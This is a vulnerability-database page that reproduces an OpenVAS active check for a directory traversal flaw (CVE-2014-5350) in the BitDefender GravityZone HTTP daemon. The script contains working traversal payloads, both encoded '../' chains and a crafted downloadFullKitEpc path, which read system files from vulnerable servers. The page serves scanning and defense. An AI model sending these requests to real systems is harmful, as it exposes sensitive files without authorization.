Lucene search
+L

BitDefender Products HTTP Daemon < 5.1.11.432 Directory Traversal Vulnerability - Active Check

🗓️ 17 Jul 2014 00:00:00Reported by Copyright (C) 2014 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 26 Views

BitDefender Products HTTP Daemon Directory Traversal Vulnerability. Allows an attacker to access sensitive information through a crafted HTTP GET request. Affected version: BitDefender GravityZone <= 5.1.5.386. Solution: Update to BitDefender GravityZone >= 5.1.11.432

Related
Refs
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
Bitdefender GravityZone < 5.1.11.432 Information Disclosure
25 Jul 201400:00
nessus
CVE
CVE-2014-5350
19 Aug 201419:00
cve
Cvelist
CVE-2014-5350
19 Aug 201419:00
cvelist
EUVD
EUVD-2014-5239
7 Oct 202500:30
euvd
NVD
CVE-2014-5350
19 Aug 201419:55
nvd
Prion
Directory traversal
19 Aug 201419:55
prion
RedhatCVE
CVE-2014-5350
22 May 202500:35
redhatcve
# SPDX-FileCopyrightText: 2014 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.105063");
  script_version("2025-11-12T05:40:18+0000");
  script_tag(name:"last_modification", value:"2025-11-12 05:40:18 +0000 (Wed, 12 Nov 2025)");
  script_tag(name:"creation_date", value:"2014-07-17 12:10:53 +0200 (Thu, 17 Jul 2014)");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");

  script_cve_id("CVE-2014-5350");

  script_tag(name:"qod_type", value:"remote_vul");

  script_tag(name:"solution_type", value:"VendorFix");

  script_name("BitDefender Products HTTP Daemon < 5.1.11.432 Directory Traversal Vulnerability - Active Check");

  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2014 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("gb_get_http_banner.nasl", "os_detection.nasl");
  script_require_ports("Services/www", 7074);
  script_mandatory_keys("Arrakis/banner");

  script_tag(name:"summary", value:"BitDefender is prone to a directory traversal vulnerability
  because it fails to sufficiently sanitize user-supplied input data.");

  script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");

  script_tag(name:"insight", value:"Arbitrary files can be downloaded using a HTTP GET request.");

  script_tag(name:"impact", value:"Exploiting this issue allows an attacker to access potentially
  sensitive information that could aid in further attacks.");

  script_tag(name:"affected", value:"BitDefender GravityZone version 5.1.5.386 and prior.");

  script_tag(name:"solution", value:"Update to version 5.1.11.432 or later.");

  script_xref(name:"URL", value:"https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140716-3_Bitdefender_GravityZone_Multiple_critical_vulnerabilities_v10.txt");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/68669");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("os_func.inc");
include("port_service_func.inc");
include("traversal_func.inc");

port = http_get_port(default: 7074);

banner = http_get_remote_headers(port: port);
if (! banner || banner !~ "Server\s*:\s*Arrakis")
  exit( 0 );

traversals = make_list("/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/",
                       "/webservice/CORE/downloadFullKitEpc/a/1?id=../../../../../");

files = traversal_files();

foreach traversal (traversals) {
  foreach pattern (keys(files)) {
    url = traversal + files[pattern];

    if (http_vuln_check(port: port, url: url, pattern: pattern)) {
      report = http_report_vuln_url(port: port, url: url);
      security_message(port: port, data: report);
      exit(0);
    }
  }
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation